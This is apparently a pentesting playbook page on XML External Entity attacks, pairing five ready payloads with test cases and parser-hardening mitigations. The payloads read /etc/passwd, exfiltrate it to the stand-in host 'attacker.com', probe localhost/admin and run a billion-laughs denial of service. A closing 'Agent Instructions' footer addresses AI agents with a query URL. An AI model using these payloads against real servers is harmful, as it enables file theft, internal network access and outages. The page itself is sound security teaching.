# XXE

**Description:**\
XML External Entity (XXE) attacks exploit vulnerabilities in XML parsers that process external entities within XML documents. By injecting malicious XML entities, attackers can read files, access internal systems, or execute remote code on the server.

**Example with Scenario:**\
Consider a web application that accepts XML input for processing. If the XML parser is configured to resolve external entities, an attacker can inject a malicious entity to read sensitive files or perform network requests.

**Payloads and Test Cases:**

1. **Basic XXE to Read Files:**

   ```xml
   <?xml version="1.0"?>
   <!DOCTYPE foo [  
       <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
   <foo>&xxe;</foo>
   ```

   * Test Case: Verify if the response includes the content of `/etc/passwd`.
2. **Blind XXE with Out-of-Band Data Exfiltration:**

   ```xml
   <?xml version="1.0"?>
   <!DOCTYPE foo [  
       <!ENTITY xxe SYSTEM "http://attacker.com?data=file:///etc/passwd"> ]>
   <foo>&xxe;</foo>
   ```

   * Test Case: Check the server logs or network traffic to see if there is an outbound request to `http://attacker.com`.
3. **XXE to Perform SSRF:**

   ```xml
   <?xml version="1.0"?>
   <!DOCTYPE foo [  
       <!ENTITY xxe SYSTEM "http://localhost/admin"> ]>
   <foo>&xxe;</foo>
   ```

   * Test Case: Observe if there is any interaction with internal services like `http://localhost/admin`.
4. **Billion Laughs Attack (Denial of Service):**

   ```xml
   <?xml version="1.0"?>
   <!DOCTYPE lolz [
       <!ENTITY lol "lol">
       <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
       <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
       <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
       <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
       <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
       <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
       <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
       <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
       <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
   ]>
   <lolz>&lol9;</lolz>
   ```

   * Test Case: The server may crash or become unresponsive due to excessive resource consumption.
5. **XXE with Parameter Entities (File Disclosure):**

   ```xml
   <?xml version="1.0"?>
   <!DOCTYPE foo [
       <!ENTITY % file SYSTEM "file:///etc/passwd">
       <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
       %eval;
       %exfil;
   ]>
   <foo>&xxe;</foo>
   ```

   * Test Case: Check for network traffic to `http://attacker.com` containing the file content.

**Mitigation:**

1. **Disable External Entity Resolution:**

   * Configure the XML parser to disable external entity resolution.

   ```java
   SAXParserFactory spf = SAXParserFactory.newInstance();
   spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
   spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
   spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
   ```
2. **Use a Secure XML Parser:**
   * Use XML parsers that are secure by default, such as `defusedxml` in Python.
3. **Input Validation:**
   * Validate and sanitize XML input to ensure it does not contain any external entities.
4. **Limit File System Access:**
   * Run the application with the least privileges necessary, and restrict file system access.
5. **Network Segmentation:**
   * Ensure that servers processing XML input are not able to access sensitive internal networks.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://playbook.sidthoviti.com/web-app-pentesting/xxe.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.